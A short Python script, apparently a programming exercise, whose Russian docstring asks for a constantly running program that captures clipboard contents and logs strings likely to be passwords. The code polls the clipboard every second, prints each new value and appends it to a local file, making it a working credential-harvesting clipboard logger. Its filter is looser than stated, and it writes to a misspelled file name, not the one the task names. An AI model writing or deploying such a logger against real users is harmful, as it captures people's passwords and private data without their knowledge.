"""
Напиши программу, которая постоянно запущена и периодически получает содержимое буфера обмена. Если оно изменилось, то
дописывает его в конец файла monitoring.txt. Попробуй записывать в лог только те перехваченные строки, в которых есть
латинские буквы и цифры, так более вероятно поймать пароли.
"""
import pyperclip
import time

norm = 'abcdefghijklmnopqrstuvwxyz0123456789'
DIR = 'bufer_to_file'


def check_and_write(data):
    res = [True for x in data.lower() if x in norm]
    if res:
        with open(f'{DIR}/resulr.txt', 'a', encoding='utf-8') as f:
            f.write(data)
            f.write('\n')


old = ''
while True:
    # Кладем в переменную s содержимое буфера обмена
    s = pyperclip.paste()
    # Если полученное содержимое не равно предыдущему, то:
    if(s != old):
        # печатаем его
        print(s)
        check_and_write(s)
        # в переменную old записываем текущее пойманное значение
        # чтобы в следующий виток цикла не повторяться и не печатать то, что уже поймано
        old = s

    # В конце витка цикла делаем паузу в одну секунду, чтобы содержимое буфера обмена успело прогрузиться
    time.sleep(1)
